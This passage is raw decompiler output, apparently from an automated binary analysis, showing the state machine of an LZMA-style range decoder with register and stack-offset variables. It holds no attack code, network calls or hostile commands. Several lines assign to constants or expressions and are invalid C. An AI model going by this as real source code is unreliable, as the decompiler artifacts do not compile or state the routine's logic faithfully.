                      								 *(_t613 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							_t67 = _t613 - 0x70;
                      							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      							if( *(_t613 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							__edx = 0;
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x34) = 1;
                      								 *(__ebp - 0x84) = 7;
                      								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      							__esi =  *(__ebp - 0x60);
                      							__cl = 8;
                      							__cl = 8 -  *(__ebp - 0x3c);
                      							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      							__ecx =  *(__ebp - 0x3c);
                      							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      							__ecx =  *(__ebp - 4);
                      							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      							__eflags =  *(__ebp - 0x38) - 4;
                      							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      							if( *(__ebp - 0x38) >= 4) {
                      								__eflags =  *(__ebp - 0x38) - 0xa;
                      								if( *(__ebp - 0x38) >= 0xa) {
                      									_t98 = __ebp - 0x38;
                      									 *_t98 =  *(__ebp - 0x38) - 6;
                      									__eflags =  *_t98;
                      								} else {
                      									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      								}
                      							} else {
                      								 *(__ebp - 0x38) = 0;
                      							}
                      							__eflags =  *(__ebp - 0x34) - __edx;
                      							if( *(__ebp - 0x34) == __edx) {
                      								__ebx = 0;
                      								__ebx = 1;
                      								goto L61;
                      							} else {
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__ecx =  *(__ebp - 8);
                      								__ebx = 0;
                      								__ebx = 1;
                      								__al =  *((intOrPtr*)(__eax + __ecx));
                      								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      								goto L41;
                      							}
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L69;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							goto L0;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
                      							__ecx =  *(__ebp - 0x2c);
                      							 *(__ebp - 0x2c) = __eax;
                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      							goto L89;
                      						case 0xc:
                      							L99:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xc;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t334 = __ebp - 0x70;
                      							 *_t334 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t334;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							__eax =  *(__ebp - 0x2c);
                      							goto L101;
                      						case 0xd:
                      							L37:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xd;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t122 = __ebp - 0x70;
                      							 *_t122 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t122;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L39:
                      							__eax =  *(__ebp - 0x40);
                      							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      								goto L48;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L54;
                      							}
                      							L41:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L39;
                      							} else {
                      								goto L37;
                      							}
                      						case 0xe:
                      							L46:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xe;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t156 = __ebp - 0x70;
                      							 *_t156 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t156;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							while(1) {
                      								L48:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x58);
                      								__edx = __ebx + __ebx;
                      								__ecx =  *(__ebp - 0x10);
                      								__esi = __edx + __eax;
                      								__ecx =  *(__ebp - 0x10) >> 0xb;
                      								__ax =  *__esi;
                      								 *(__ebp - 0x54) = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      								__eflags =  *(__ebp - 0xc) - __ecx;
                      								if( *(__ebp - 0xc) >= __ecx) {
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      									__cx = __ax;
                      									_t170 = __edx + 1; // 0x1
                      									__ebx = _t170;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									 *(__ebp - 0x10) = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L46;
                      								}
                      							}
                      							L54:
                      							_t173 = __ebp - 0x34;
                      							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      							__eflags =  *_t173;
                      							goto L55;
                      						case 0xf:
                      							L58:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0xf;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t203 = __ebp - 0x70;
                      							 *_t203 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t203;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L60:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L55:
                      								__al =  *(__ebp - 0x44);
                      								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      								goto L56;
                      							}
                      							L61:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t217 = __edx + 1; // 0x1
                      								__ebx = _t217;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L60;
                      							} else {
                      								goto L58;
                      							}
                      						case 0x10:
                      							L109:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x10;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t365 = __ebp - 0x70;
                      							 *_t365 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t365;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							goto L111;
                      						case 0x11:
                      							goto L69;
                      						case 0x12:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 0x58);
                      								 *(__ebp - 0x84) = 0x13;
                      								__esi =  *(__ebp - 0x58) + 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							__eflags = __eax;
                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                      							goto L130;
                      						case 0x13:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								_t469 = __ebp - 0x58;
                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                      								__eflags =  *_t469;
                      								 *(__ebp - 0x30) = 0x10;
                      								 *(__ebp - 0x40) = 8;
                      								L144:
                      								 *(__ebp - 0x7c) = 0x14;
                      								goto L145;
                      							}
                      							__eax =  *(__ebp - 0x4c);
                      							__ecx =  *(__ebp - 0x58);
                      							__eax =  *(__ebp - 0x4c) << 4;
                      							 *(__ebp - 0x30) = 8;
                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      							L130:
                      							 *(__ebp - 0x58) = __eax;
                      							 *(__ebp - 0x40) = 3;
                      							goto L144;
                      						case 0x14:
                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      							__eax =  *(__ebp - 0x80);
                      							goto L140;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      							goto L120;
                      						case 0x16:
                      							__eax =  *(__ebp - 0x30);
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx =  *(__ebp - 4);
                      							 *(__ebp - 0x40) = 6;
                      							__eax = __eax << 7;
                      							 *(__ebp - 0x7c) = 0x19;
                      							 *(__ebp - 0x58) = __eax;
                      							goto L145;
                      						case 0x17:
                      							L145:
                      							__eax =  *(__ebp - 0x40);
                      							 *(__ebp - 0x50) = 1;
                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      							goto L149;
                      						case 0x18:
                      							L146:
                      							__eflags =  *(__ebp - 0x6c);
                      							if( *(__ebp - 0x6c) == 0) {
                      								 *(__ebp - 0x88) = 0x18;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x70);
                      							__eax =  *(__ebp - 0xc);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							_t484 = __ebp - 0x70;
                      							 *_t484 =  *(__ebp - 0x70) + 1;
                      							__eflags =  *_t484;
                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      							L148:
                      							_t487 = __ebp - 0x48;
                      							 *_t487 =  *(__ebp - 0x48) - 1;
                      							__eflags =  *_t487;
                      							L149:
                      							__eflags =  *(__ebp - 0x48);
                      							if( *(__ebp - 0x48) <= 0) {
                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							L56:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1a;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x68);
                      							__al =  *(__ebp - 0x5c);
                      							__edx =  *(__ebp - 8);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      							 *( *(__ebp - 0x68)) = __al;
                      							__ecx =  *(__ebp - 0x14);
                      							 *(__ecx +  *(__ebp - 8)) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t192 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t192;
                      							goto L79;
                      						case 0x1b:
                      							goto L75;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = _t414;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x00000000
                      0x00000000
